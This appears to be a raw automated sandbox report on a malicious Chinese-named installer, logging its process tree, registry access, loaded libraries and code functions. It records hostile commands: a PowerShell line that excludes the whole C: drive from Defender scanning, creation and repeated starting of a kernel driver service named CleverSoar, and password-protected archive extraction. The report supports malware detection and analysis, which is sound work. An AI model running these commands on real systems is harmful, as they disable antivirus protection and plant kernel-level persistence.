Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C844754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: String function: 6C9F9240 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: String function: 6CA96F10 appears 505 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00DA28E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00DA1E40 appears 171 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00E3FB10 appears 723 times
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.7.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065280017.0000000002E6E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNamem11feM2J5C.exe vs #U5b89#U88c5#U52a9#U624b2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000003.2065641088.000000007EFFA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNamem11feM2J5C.exe vs #U5b89#U88c5#U52a9#U624b2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe, 00000000.00000000.2063640399.0000000000219000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNamem11feM2J5C.exe vs #U5b89#U88c5#U52a9#U624b2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe | Binary or memory string: OriginalFileNamem11feM2J5C.exe vs #U5b89#U88c5#U52a9#U624b2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal88.evad.winEXE@125/33@0/0
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C9C62D0 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00DA9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00DB3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00DA9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Code function: 6_2_6C9C57B0 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | File created: C:\Program Files (x86)\Windows NT\is-F0JVG.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6768:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1276:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4092:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6632:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6524:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6416:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5512:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1992:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4760:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5860:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6396:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3292:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5560:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6476:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1488:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1220:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1848:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5808:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | File created: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b2.0.7.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | Process created: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$2046C,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe"
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | Process created: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$20478,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | Process created: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$2046C,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe"
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp "C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$20478,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9ialdJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp | Section loaded: urlmon.dll
